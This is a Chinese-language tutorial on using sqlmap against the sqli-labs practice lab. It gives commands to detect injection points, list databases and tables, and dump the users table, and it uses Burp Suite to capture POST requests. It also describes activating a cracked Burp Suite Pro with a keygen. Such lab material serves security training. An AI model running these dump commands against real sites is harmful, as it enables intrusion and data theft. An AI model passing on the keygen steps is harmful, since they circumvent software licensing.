基于sqlmap的工具注入
sqlmap是用python语言编写的,因此需要安装python的语言环境。
SQLMap下载
链接:https://pan.baidu.com/s/1-1BSc4LPY_osDL7z8dGPEw?pwd=QQDF
提取码:QQDF
生成SQLMAP快捷方式
在桌面上创建一个新的cmd快捷方式,并将其命名为“SQLMAP”
生成的SQLMAP右键属性,修改起始位置为储存sqlmap的起始位置,点击应用,确定。
双击刚刚创建的快捷方式,然后输入python sqlmap.py -h。如果出现以下消息,则说明安装成功。
第2关
是否存在注入点
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?id=1
出现:已经检测到是mysql数据库,是否跳过检测其他类型数据库,输入y
GET 参数 ‘id’ 易受攻击,我们选择Y,sqlmap就已经判断该链接的数据库以及其他服务版本是具有SQL注入威胁存在的
列出所有数据库
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?id=1 --dbs
列出当前数据库
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?id=1 --current-db
数据库security下表名
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?id=1 --tables -D security
表users列名
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?id=1 --columns -T users
表uesrs中数据
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?id=1 --dump -T users
GET型都差不多
POST型
第15关
使用BP抓包
链接:https://pan.baidu.com/s/1LVOjIhIFcnIMHh0RS3-TcQ?pwd=QQDF
提取码:QQDF
若已安装jdk直接输入命令即可,命令:cd "D:\BP"再输入:java -jar .\burp-loader-keygen-jas502n.jar
把License里面的复制出来,然后再点击Run。没反应。
点击burpsuite_pro_v2.0.11beta
jdk版本过高
安装jdk1.8版本
配置环境变量,右击此电脑->属性
变量名Path中加入%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin
复制License内容,点击Run,粘贴,点击Next
复制红框内容
粘贴到Activation Request中,会自动生成Activation Response内容,复制
Activation Response内容粘贴到3中
点击Finish,完成。
默认选项即可。
每次启动直接点击原版启动即可。
火狐浏览器配置
获取CA证书
直接输入cacert.der
火狐导入CA证书
是否存在注入点
python sqlmap.py -r C:\Users\11731\Desktop\2.txt
当前数据库
python sqlmap.py -r C:\Users\11731\Desktop\2.txt --current-db
每次注入完需要把C盘下的缓存文件夹删除,如果不删除的话,会拿以前的注入点去注入最新的接口,有可能会造成sql注入结果无效。
sqlmap检测注入点
--dbs 列出所有数据库
--current-db 列出当前数据库
--current-user 列出当前用户
--tables 列出数据库表名
--columns 列出表列名
--dump 获取表中数据
-D 指定数据库
-T 指定表
-C 指定列
-P 指定参数